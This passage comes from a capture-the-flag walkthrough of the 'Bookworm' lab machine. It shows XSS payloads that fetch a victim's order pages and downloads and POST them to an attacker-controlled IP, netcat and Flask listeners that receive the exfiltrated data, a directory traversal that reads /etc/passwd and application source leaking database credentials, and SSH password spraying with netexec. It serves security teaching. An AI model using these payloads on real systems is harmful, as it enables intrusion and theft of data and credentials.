on port 80, and after a couple minutes, what returns is the same as what I see on mine, with different data / orders. The order numbers for the user are very low:
<tbody>
<tr>
<th scope="row">Order #7</th>
<td>Fri Dec 23 2022 20:10:04 GMT+0000 (Coordinated Universal Time)</td>
<td>£34</td>
<td>
<a href="/order/7">View Order</
</td>
</tr>
<tr>
<th scope="row">Order #8</th>
<td>Sun Dec 25 2022 20:10:04 GMT+0000 (Coordinated Universal Time)</td>
<td>£80</td>
<td>
<a href="/order/8">View Order</
</td>
</tr>
<tr>
<th scope="row">Order #9</th>
<td>Wed Dec 28 2022 20:10:04 GMT+0000 (Coordinated Universal Time)</td>
<td>£34</td>
<td>
<a href="/order/9">View Order</
</td>
</tr>
<tr>
<th scope="row">Order #407</th>
<td>Tue Jan 16 2024 17:56:24 GMT+0000 (Coordinated Universal Time)</td>
<td>£40</td>
<td>
<a href="/order/407">View Order</
</td>
</tr>
</tbody>
</table>
There’s a note on the /basket
page about being able to download earlier orders as e-books:
To see what that looks like, I’ll check out these orders, updating my script first to:
fetch('/profile', {credentials: "include"})
.then((resp) => resp.text())
.then((resptext) => {
var regex = /\/order\/\d+/g;
while ((match = regex.exec(resptext)) !== null) {
fetch("http://10.10.14.6" + match);
};
});
I’ll run nc -klnvp 80
so that it stays open and handles multiple requests on 80. When this executes, I get the IDs from the target profile:
oxdf@hacky$ nc -lnkvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.215 44720
GET /order/16 HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
Connection received on 10.10.11.215 44722
GET /order/17 HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
Connection received on 10.10.11.215 44730
GET /order/18 HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
I’ll update this to return the order pages:
fetch('/profile', {credentials: "include"})
.then((resp) => resp.text())
.then((resptext) => {
var regex = /\/order\/\d+/g;
while ((match = regex.exec(resptext)) !== null) {
fetch(match, {credentials: "include"})
.then((resp2) => resp2.text())
.then((resptext2) => {
fetch("http://10.10.14.6/exfil" + match, {
method: "POST",
mode: "no-cors",
body: resptext2
});
});
};
});
This should get each order page in the profile, fetch it, and return it to me via POST request.
After a few minutes (and a few attempts running the script), I get a connection, which gives a few pages. For example, one might look like the following page:
The CSS doesn’t load, but that’s ok. The interesting part is the “Download e-book” link, which points to /download/7?bookIds=9
. Some orders have more than one book, and look like this:
The important difference here is the “Download everything link”, which leads to /download/2?bookIds=18&bookIds=11
. It seems that the bookIds
parameter can be a single string or (when multiple are specified) an array (I go over why this works in Beyond Root.
I’ll try to download a file by updating my script to find the link again to get a single download link and return what it returns. I’ve updated the response to be resp3.blob()
rather than .text()
because I expect an e-book to be a binary format:
fetch('/profile', {credentials: "include"})
.then((resp) => resp.text())
.then((resptext) => {
var match = resptext.match(/\/order\/\d+/);
fetch(match, {credentials: "include"})
.then((resp2) => resp2.text())
.then((resptext2) => {
var match2 = resptext2.match(/\/download\/\d+\?bookIds=\d+/);
fetch(match2, {credentials: "include"})
.then((resp3) => resp3.blob())
.then((data) => {
fetch("http://10.10.14.6/exfil", {
method: "POST",
mode: "no-cors",
body: data
});
});
});
});
This one returns a PDF:
oxdf@hacky$ nc -lnvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.215 33964
POST /exfil HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
Content-Length: 1006
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
%PDF-1.3
3 0 obj
<</Type /Page
/Parent 1 0 R
/Resources 2 0 R
/Contents 4 0 R>>
endobj
4 0 obj
<</Filter /FlateDecode /Length 115>>
stream
x=̱
@E~uj8-zZ D6_^8505O
@*b8ۚj!*,aێ73ڴx~2nSN^{N;gE#q=ӉQ}Q
endstream
endobj
1 0 obj
<</Type /Pages
/Kids [3 0 R ]
/Count 1
/MediaBox [0 0 595.28 841.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Producer (PyFPDF 1.7.2 http://pyfpdf.googlecode.com/)
/CreationDate (D:20230129212444)
>>
endobj
7 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/OpenAction [3 0 R /FitH null]
/PageLayout /OneColumn
>>
endobj
xref
0 8
0000000000 65535 f
0000000272 00000 n
0000000455 00000 n
0000000009 00000 n
0000000087 00000 n
0000000359 00000 n
0000000559 00000 n
0000000668 00000 n
trailer
<<
/Size 8
/Root 7 0 R
/Info 6 0 R
>>
startxref
771
%%EOF
I’m curious to see what comes back when I try to download multiple books at the same time. It seems unlikely that it would be a single PDF, and more likely some kind of archive.
I wasted a ton of time trying to write JavaScript that would check each order page for a “Download everything” link and visit it. I’m sure it’s possible, but the JS was getting complex and very difficult to troubleshoot blindly and over 4-5 minute waits.
Eventually I decided to try seeing how tied to the current user to download is. The order ID in the URL must match the current user, or nothing comes back. But it doesn’t seem that that books are checked to see if they are in the current order. That means I can just grab an order ID from the profile and then download any books I want:
fetch('/profile', {credentials: 'include'})
.then((resp) => resp.text())
.then((resptext) => {
order_id = resptext.match(/\/order\/(\d+)/);
fetch("http://bookworm.htb/download/"+order_id[1]+"?bookIds=1&bookIds=2", {credentials: 'include'})
.then((resp2) => resp2.blob())
.then((data) => {
fetch("http://10.10.14.6/exfil", {
method: "POST",
mode: 'no-cors',
body: data
});
});
});
What comes back is a ZIP archive:
oxdf@hacky$ nc -lnvkp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.215 47762
POST /exfil HTTP/1.1
Host: 10.10.14.6
Connection: keep-alive
Content-Length: 1629
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.199 Safari/537.36
Accept: */*
Origin: http://bookworm.htb
Referer: http://bookworm.htb/
Accept-Encoding: gzip, deflate
p>V$Alice's Adventures in Wonderland.pdfmRkAै'RhnɦmIA2L3qwVfE E< Vz)V=yDL~Ѹ{7Kj( /UQ"u
8Glpx PA<yZHq&(>DdL"E]6q.4M-^)*L"_xPg5u*aנx<1~z7vV-]g+i?{4v??>oz?
æ>~GmsEt/ə@xT-* JAE8,^v ~ؿp;<vnQU6.GSaY")HWB
_`]%>,E#K=$*8k˖Hp:䚦RCB'07+r%dsnCQS%,MhaEE">XXg'SDr-m2[lڒY`;wIpwix0r@T:Ti1
Fc2v hhx85P?up>VThrough the Looking-Glass.pdfmRn@`$Tu]P)-"gUMj5Pp$XtX6;~>WaMm x39.U뺚Չ
=R*ѭ~nnL
8:40mT8De̗,Ya$0jE*zG
$1{;hu>Wkt/̝_8||yA晸QxK,sSP?svg\yQN:,8@BO)qEhBokM0fV+@PbZaKkq]so@70z"\B/#P ]gC*K 0/MsԮZ@':nk2>k-B
z+2MtEՊ4%?0ݷg5Bily
LawzsB,֨wf3()^m@('LS7
(Y0n3}\N?V#|P \4!dB
bx|.GPWG|Pp>V?u$ Alice's Adventures in Wonderland.pdfPp>VWG| Through the Looking-Glass.pdfPK
It looks a bit weird here because some of the binary bytes end up messing up some of the ASCII ones, but collecting it again and saving it to a file shows that it is as I’ll show in the next section.
If I’m going to be trying to collect files, it seems time to make a better webserver than just catching them with nc
.
from pathlib import Path
from flask import Flask, request
app = Flask(__name__)
@app.route('/exfil', methods=["POST"])
def exfil():
print("Got a file")
data = request.get_data()
output = Path(f'exfil/exfil.zip')
output.write_bytes(data)
return ""
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=80)
This is a simple Python Flask server that will save any file sent to /exfil
to a file in the exfil
directory as a Zip.
Now I can run the same get for two PDFs above and get a ZIP:
oxdf@hacky$ file exfil/exfil.zip
exfil/exfil.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
oxdf@hacky$ unzip -l exfil/exfil.zip
Archive: exfil/exfil.zip
Length Date Time Name
--------- ---------- ----- ----
1006 2023-01-30 19:51 Alice's Adventures in Wonderland.pdf
1001 2023-01-30 19:51 Through the Looking-Glass.pdf
--------- -------
2007 2 files
Thinking about how the server is working, likely these e-books are stored on the file system. It’s worth looking at the download requests to see if I can read other files off the file system.
Trying the single download doesn’t seem to work. I just get nothing back. I’ll look at this in Beyond Root. I’ll try this payload to do a directory traversal in the multi-file download:
fetch('/profile', {credentials: 'include'})
.then((resp) => resp.text())
.then((resptext) => {
order_id = resptext.match(/\/order\/(\d+)/);
fetch("http://bookworm.htb/download/"+order_id[1]+"?bookIds=1&bookIds=../../../../etc/passwd", {credentials: 'include'})
.then((resp2) => resp2.blob())
.then((data) => {
fetch("http://10.10.14.6/exfil", {
method: "POST",
mode: 'no-cors',
body: data
});
});
});
When it returns, there’s a Unknown.pdf
in the zip:
oxdf@hacky$ unzip -l exfil/exfil.zip
Archive: exfil/exfil.zip
Length Date Time Name
--------- ---------- ----- ----
1006 2023-01-30 19:51 Alice's Adventures in Wonderland.pdf
2087 2023-06-05 20:53 Unknown.pdf
--------- -------
3093 2 files
It’s not a PDF, but /etc/passwd
:
oxdf@hacky$ cat exfil/Unknown.pdf
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
frank:x:1001:1001:,,,:/home/frank:/bin/bash
neil:x:1002:1002:,,,:/home/neil:/bin/bash
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
fwupd-refresh:x:114:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:997:997::/var/log/laurel:/bin/false
james:x:1000:1000:,,,:/home/james:/bin/bash
In addition to a proof that the directory traversal works, I’ll also note the usernames frank, neil, and james.
I’ll try to pull the source code for this application. I know it’s Express, so the main function is likely in an index.js
. It’s not in the current directory, but it returns the source with the XSS payload updated with:
fetch("http://bookworm.htb/download/"+order_id[1]+"?bookIds=1&bookIds=../index.js", {credentials: 'include'})
The main source is:
const express = require("express");
const nunjucks = require("nunjucks");
const path = require("path");
const session = require("cookie-session");
const fileUpload = require("express-fileupload");
const archiver = require("archiver");
const fs = require("fs");
const { flash } = require("express-flash-message");
const { sequelize, User, Book, BasketEntry, Order, OrderLine } = require("./database");
const { hashPassword, verifyPassword } = require("./utils");
const { QueryTypes } = require("sequelize");
const { randomBytes } = require("node:crypto");
const timeAgo = require("timeago.js");
const app = express();
const port = 3000;
const env = nunjucks.configure("templates", {
autoescape: true,
express: app,
});
env.addFilter("timeago", (val) => {
return timeAgo.format(new Date(val), "en_US");
});
app.use(express.urlencoded({ extended: false }));
app.use(
session({
secret: process.env.NODE_ENV === "production" ? randomBytes(69).toString("hex") : "secret",
resave: false,
saveUninitialized: true,
cookie: {
maxAge: 1000 * 60 * 60 * 24 * 7,
httpOnly: false,
},
})
);
app.use(flash({ sessionKeyName: "flashMessage", useCookieSession: true }));
app.use("/static", express.static(path.join(__dirname, "static")));
app.use(
fileUpload({
limits: { fileSize: 2 * 1024 * 1024 },
})
);
app.use((req, res, next) => {
res.set("Content-Security-Policy", "script-src 'self'");
next();
});
const renderWithFlashes = async (req, res, template, data = {}) => {
res.render(template, {
errors: await req.consumeFlash("error"),
successes: await req.consumeFlash("success"),
user: req.session.user,
currentUrl: req.url,
basketCount: req.session.user ? (await BasketEntry.sum("quantity", { where: { userId: req.session.user.id } })) ?? 0 : 0,
...data,
});
};
app.get("/", async (req, res) => {
await renderWithFlashes(req, res, "index.njk");
});
app.get("/login", async (req, res) => {
if (req.session.user) {
return res.redirect("/shop");
}
await renderWithFlashes(req, res, "login.njk");
});
app.post("/login", async (req, res) => {
const { username, password } = req.body;
const user = await User.findOne({
where: {
username,
},
});
if (!user) {
await req.flash("error", "Invalid username or password.");
return res.redirect("/login");
}
if (!verifyPassword(password, user.password)) {
await req.flash("error", "Invalid username or password.");
return res.redirect("/login");
}
console.log(user.username, "logged in");
req.session.user = {
id: user.id,
name: user.name,
avatar: user.avatar,
};
await req.flash("success", "You have successfully logged in. Welcome back!");
res.redirect("/shop");
});
app.get("/register", async (req, res) => {
await renderWithFlashes(req, res, "register.njk");
});
app.post("/register", async (req, res) => {
const { name, username, password, addressLine1, addressLine2, town, postcode } = req.body;
const users = await User.findAll({
where: {
username,
},
});
if (users.length !== 0) {
await req.flash("error", "A user with this username already exists!");
return res.redirect("/login");
}
if (
name.length == 0 ||
username.length == 0 ||
password.length == 0 ||
addressLine1.length == 0 ||
addressLine2.length == 0 ||
town.length == 0 ||
postcode.length == 0
) {
await req.flash("error", "Sorry, all fields are required to be filled out!!");
return res.redirect("/login");
}
if (
name.length > 20 ||
username.length > 20 ||
password.length > 20 ||
addressLine1.length > 20 ||
addressLine2.length > 20 ||
town.length > 20 ||
postcode.length > 20
) {
await req.flash("error", "Sorry, we can't accept any data longer than 20 characters!");
return res.redirect("/login");
}
await User.create({
name: name,
username: username,
password: hashPassword(password),
avatar: `/static/img/user.png`,
addressLine1,
addressLine2,
town,
postcode,
});
await req.flash("success", "Account created! Please log in.");
res.redirect("/login");
});
app.get("/logout", async (req, res) => {
req.session.user = undefined;
await req.flash("success", "You have been logged out. Please visit again soon.");
return res.redirect("/");
});
app.get("/shop", async (req, res) => {
// Not included in development version as sqlite lacks interval
const timeComponent =
process.env.NODE_ENV === "production" ? " WHERE `BasketEntries`.`createdAt` > date_sub(now(), interval 5 minute) " : "";
const recentUpdates = await sequelize.query(
"SELECT `BasketEntries`.id, `BasketEntries`.createdAt, `Books`.title, `Users`.name, `Users`.avatar, `Books`.id as bookId FROM `BasketEntries` LEFT JOIN `Books` ON `Books`.id = `BasketEntries`.bookId LEFT JOIN `Users` ON `Users`.id = `BasketEntries`.userId " +
timeComponent +
" ORDER BY `BasketEntries`.`createdAt` DESC LIMIT 5",
{ type: QueryTypes.SELECT }
);
await renderWithFlashes(req, res, "shop.njk", {
books: await Book.findAll(),
basket: req.session.user
? (await BasketEntry.findAll({ where: { userId: req.session.user.id } })).map((x) => JSON.stringify(x.toJSON()))
: [],
recentUpdates: recentUpdates,
});
});
app.get("/shop/:id", async (req, res) => {
const id = req.params.id;
const book = await Book.findOne({ where: { id } });
if (!book) {
await req.flash("error", "That book doesn't seem to exist!");
return res.redirect("/shop");
}
await renderWithFlashes(req, res, "book.njk", { book });
});
app.get("/basket", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to access your basket!");
return res.redirect("/login");
}
const entries = await BasketEntry.findAll({ where: { userId: req.session.user.id } });
const basket = [];
for (const entry of entries) {
basket.push({
...entry.toJSON(),
book: await Book.findByPk(entry.bookId),
});
}
await renderWithFlashes(req, res, "basket.njk", { entries: basket });
});
app.post("/basket/add", async (req, res) => {
const { bookId, quantity: quantityRaw } = req.body;
const quantity = parseInt(quantityRaw);
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to add to your basket!");
return res.redirect("/login");
}
if (isNaN(quantity) || quantity <= 0) {
await req.flash("error", "Something went wrong when adding to the basket, please try again!");
return res.redirect("/shop");
}
const book = await Book.findByPk(bookId);
if (!book) {
await req.flash("error", "We couldn't find that book, please try again!");
return res.redirect("/shop");
}
const userId = req.session.user.id;
const existingEntry = await BasketEntry.findOne({ where: { bookId, userId } });
if (existingEntry) {
existingEntry.quantity += quantity;
await existingEntry.save();
} else {
await BasketEntry.create({ bookId, userId, quantity: quantity, note: "" });
}
await req.flash("success", "Added the item to your basket!");
return res.redirect("/shop");
});
app.post("/basket/:id/delete", async (req, res) => {
const { id } = req.params;
const entry = await BasketEntry.findByPk(id);
if (!entry) {
await req.flash("error", "We can't seem to find that entry in your basket, please try again!");
return res.redirect("/basket");
}
await entry.destroy();
await req.flash("success", "Successfully deleted that item from your basket.");
return res.redirect("/basket");
});
app.post("/basket/:id/edit", async (req, res) => {
const { id } = req.params;
const { quantity: quantityRaw, note } = req.body;
const quantity = parseInt(quantityRaw);
if (isNaN(quantity)) {
await req.flash("error", "Something went wrong when adding to the basket, please try again!");
return res.redirect("/shop");
}
const entry = await BasketEntry.findByPk(id);
if (!entry) {
await req.flash("error", "We can't seem to find that entry in your basket, please try again!");
return res.redirect("/basket");
}
if (quantity <= 0) {
await entry.destroy();
} else {
entry.note = note;
entry.quantity = quantity;
await entry.save();
}
await req.flash("success", "Successfully updated that item in your basket.");
return res.redirect("/basket");
});
app.post("/checkout", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to checkout!");
return res.redirect("/login");
}
const entries = await BasketEntry.findAll({ where: { userId: req.session.user.id } });
if (entries.length === 0) {
await req.flash("error", "Sorry, you must add something to your basket!");
return res.redirect("/basket");
}
const user = await User.findByPk(req.session.user.id);
const address = `${user.name}
${user.addressLine1}
${user.addressLine2}
${user.town}
${user.postcode}`.replace("\n\n", "\n");
const order = await Order.create({
userId: req.session.user.id,
shippingAddress: address,
totalPrice: 0.0,
});
let totalPrice = 0;
for (const entry of entries) {
const book = await Book.findByPk(entry.bookId);
await OrderLine.create({ orderId: order.id, bookId: entry.bookId, quantity: entry.quantity, note: entry.note });
totalPrice += book.price * entry.quantity;
await entry.destroy();
}
order.totalPrice = totalPrice;
await order.save();
await req.flash("success", "Your order has been completed!");
return res.redirect(`/order/${order.id}`);
});
app.get("/order/:id", async (req, res) => {
const { id } = req.params;
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to view your orders!");
return res.redirect("/login");
}
const order = await Order.findByPk(id);
if (!order || order.userId !== req.session.user.id) {
await req.flash("error", "Sorry, we can't find that order!");
return res.redirect("/profile");
}
const entries = await OrderLine.findAll({ where: { orderId: id } });
const orderDetails = order.toJSON();
orderDetails.orderLines = [];
for (const entry of entries) {
orderDetails.orderLines.push({
...entry.toJSON(),
book: await Book.findByPk(entry.bookId),
});
}
await renderWithFlashes(req, res, "order.njk", {
order: orderDetails,
bookIdsQueryParam: orderDetails.orderLines.map((x) => `bookIds=${x.bookId}`).join("&"),
});
});
app.get("/profile", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to view your profile!");
return res.redirect("/login");
}
await renderWithFlashes(req, res, "profile.njk", {
user: await User.findByPk(req.session.user.id),
orders: await Order.findAll({ where: { userId: req.session.user.id } }),
});
});
app.post("/profile", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to update your profile!");
return res.redirect("/login");
}
const { name, addressLine1, addressLine2, town, postcode } = req.body;
if (
name.length == 0 ||
addressLine1.length == 0 ||
addressLine2.length == 0 ||
town.length == 0 ||
postcode.length == 0
) {
await req.flash("error", "Sorry, all fields are required to be filled out!!");
return res.redirect("/login");
}
if (
name.length > 20 ||
addressLine1.length > 20 ||
addressLine2.length > 20 ||
town.length > 20 ||
postcode.length > 20
) {
await req.flash("error", "Sorry, we can't accept any data longer than 20 characters!");
return res.redirect("/login");
}
const user = await User.findByPk(req.session.user.id);
user.name = name;
user.addressLine1 = addressLine1;
user.addressLine2 = addressLine2;
user.town = town;
user.postcode = postcode;
await user.save();
await req.flash("success", "Successfully updated your profile!");
return res.redirect("/profile");
});
app.get("/download/:orderId", async (req, res) => {
const { orderId } = req.params;
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to download your files!");
return res.redirect("/login");
}
const order = await Order.findOne({ where: { id: orderId, userId: req.session.user.id } });
if (!order) {
await req.flash("error", "Sorry, we can't find that download!");
return res.redirect("/profile");
}
if (!order.canDownload) {
await req.flash("error", "Sorry, we can't offer downloads on this order!");
return res.redirect("/profile");
}
const { bookIds } = req.query;
if (typeof bookIds === "string") {
const fileName = `${bookIds}.pdf`;
res.download(bookIds, fileName, { root: path.join(__dirname, "books") });
} else if (Array.isArray(bookIds)) {
const arch = archiver("zip");
for (const id of bookIds) {
const fileName = (await Book.findByPk(id))?.title ?? "Unknown";
arch.file(path.join(__dirname, "books", id), { name: `${fileName}.pdf` });
}
res.attachment(`Order ${orderId}.zip`).type("zip");
arch.on("end", () => res.end()); // end response when archive stream ends
arch.pipe(res);
arch.finalize();
} else {
res.sendStatus(404);
}
});
app.post("/profile/avatar", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to view your profile!");
return res.redirect("/login");
}
const file = req.files?.avatar;
if (!file) {
await req.flash("error", "Sorry, you must upload a file!");
return res.redirect("/profile");
}
if (file.mimetype !== "image/jpeg" && file.mimetype !== "image/png") {
await req.flash("error", "Sorry, you must upload a JPEG or a PNG!");
return res.redirect("/profile");
}
await file.mv(path.join(__dirname, "static", "img", "uploads", req.session.user.id.toString()));
const user = await User.findByPk(req.session.user.id);
user.avatar = `/static/img/uploads/${req.session.user.id}`;
await user.save();
res.redirect("/profile");
});
(async function () {
await sequelize.sync({ force: process.env.NODE_ENV !== "production" });
try {
const { migrate } = require("./migrate");
await migrate();
} catch {
console.log("Skipping database initialisation as import failed");
}
app.listen(port, process.env.NODE_ENV === "production" ? "127.0.0.1" : "0.0.0.0", async () => {
console.log(`Bookworm listening on port ${port}`);
});
})();
There’s a lot here to look at, but what ends up as interesting is the local import of database.js
:
const { sequelize, User, Book, BasketEntry, Order, OrderLine } = require("./database");
I’ll pull that:
const { Sequelize, Model, DataTypes } = require("sequelize");
//const sequelize = new Sequelize("sqlite::memory::");
const sequelize = new Sequelize(
process.env.NODE_ENV === "production"
? {
dialect: "mariadb",
dialectOptions: {
host: "127.0.0.1",
user: "bookworm",
database: "bookworm",
password: "FrankTh3JobGiver",
},
logging: false,
}
: "sqlite::memory::"
);
const User = sequelize.define("User", {
name: {
type: DataTypes.STRING(20),
allowNull: false,
},
username: {
type: DataTypes.STRING(20),
unique: true,
allowNull: false,
},
password: {
type: DataTypes.STRING(32),
allowNull: false,
},
avatar: {
type: DataTypes.STRING,
allowNull: false,
},
addressLine1: {
type: DataTypes.STRING(20),
allowNull: false,
},
addressLine2: {
type: DataTypes.STRING(20),
allowNull: false,
},
town: {
type: DataTypes.STRING(20),
allowNull: false,
},
postcode: {
type: DataTypes.STRING(20),
allowNull: false,
},
});
const BasketEntry = sequelize.define("BasketEntry", {
userId: DataTypes.INTEGER,
bookId: DataTypes.INTEGER,
quantity: DataTypes.INTEGER,
note: DataTypes.STRING,
});
const Book = sequelize.define("Book", {
title: DataTypes.STRING,
description: DataTypes.TEXT,
price: DataTypes.DECIMAL,
image: DataTypes.STRING,
author: DataTypes.STRING,
upc: DataTypes.STRING,
publishDate: DataTypes.DATEONLY,
language: DataTypes.STRING,
});
const Order = sequelize.define("Order", {
userId: DataTypes.INTEGER,
shippingAddress: DataTypes.TEXT,
totalPrice: DataTypes.DECIMAL,
canDownload: {
type: DataTypes.BOOLEAN,
allowNull: false,
defaultValue: false,
},
});
const OrderLine = sequelize.define("OrderLine", {
orderId: DataTypes.INTEGER,
bookId: DataTypes.INTEGER,
quantity: DataTypes.INTEGER,
note: DataTypes.STRING,
});
module.exports = {
sequelize,
User,
Book,
BasketEntry,
Order,
OrderLine,
};
There’s creds at the top.
I’ve got three usernames from the passwd
file, and now another username and password from the database. netexec
(formerly crackmapexec
) is a quick way to check if any work over SSH. I like to include --continue-on-success
to see if multiple users might use that password:
oxdf@hacky$ netexec ssh bookworm.htb -u users.txt -p FrankTh3JobGiver --continue-on-success
SSH 10.10.11.215 22 bookworm.htb [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
SSH 10.10.11.215 22 bookworm.htb [+] frank:FrankTh3JobGiver - shell access!
SSH 10.10.11.215 22 bookworm.htb [-] neil:FrankTh3JobGiver Authentication failed.
SSH 10.10.11.215 22 bookworm.htb [-] james:FrankTh3JobGiver Authentication failed.
SSH 10.10.11.215 22 bookworm.htb [-] bookworm:FrankTh3JobGiver Authentication failed.
It works for frank!
I’m able to get a shell as frank:
oxdf@hacky$ sshpass -p FrankTh3JobGiver ssh frank@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
frank@bookworm:~$
And user.txt
:
frank@bookworm:~$ cat user.txt
067130be************************
frank’s home directory is very empty:
frank@bookworm:~$ ls -la
total 36
drwxr-xr-x 5 frank frank 4096 May 24 2023 .
drwxr-xr-x 5 root root 4096 Jun 5 2023 ..
lrwxrwxrwx 1 root root 9 Jan 30 2023 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 220 Jan 30 2023 .bash_logout
-rw-r--r-- 1 frank frank 3771 Jan 30 2023 .bashrc
drwx------ 2 frank frank 4096 May 3 2023 .cache
drwxrwxr-x 3 frank frank 4096 May 3 2023 .local
lrwxrwxrwx 1 root root 9 Jan 30 2023 .mysql_history -> /dev/null
-rw-r--r-- 1 frank frank 807 Jan 30 2023 .profile
drwx------ 2 frank frank 4096 May 3 2023 .ssh
-rw-r----- 1 root frank 33 Jan 17 11:14 user.txt
There are two other home directories. frank can’t access james, but can access neil’s:
frank@bookworm:/home$ ls
frank james neil
frank@bookworm:/home$ cd james/
-bash: cd: james/: Permission denied
frank@bookworm:/home$ cd neil/
frank@bookworm:/home/neil$
There’s an interesting directory, converter
, which seems to hold another JavaScript web application:
frank@bookworm:/home/neil$ ls -la
total 36
drwxr-xr-x 6 neil neil 4096 May 3 2023 .
drwxr-xr-x 5 root root 4096 Jun 5 2023 ..
lrwxrwxrwx 1 root root 9 Jan 30 2023 .bash_history -> /dev/null
-rw-r--r-- 1 neil neil 220 Jan 30 2023 .bash_logout
-rw-r--r-- 1 neil neil 3771 Jan 30 2023 .bashrc
drwx------ 2 neil neil 4096 May 3 2023 .cache
drwxr-xr-x 3 neil neil 4096 May 3 2023 .config
drwxr-xr-x 7 root root 4096 May 3 2023 converter
lrwxrwxrwx 1 root root 9 Jan 30 2023 .mysql_history -> /dev/null
-rw-r--r-- 1 neil neil 807 Jan 30 2023 .profile
drwx------ 2 neil neil 4096 Dec 5 19:56 .ssh
frank@bookworm:/home/neil$ ls converter/
calibre index.js node_modules output package.json package-lock.json processing templates
There are services listening on 3000 and 3001:
frank@bookworm:/home/neil/converter$ netstat -tnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
The service on 127.0.0.1:3000
is just the server behind port 80:
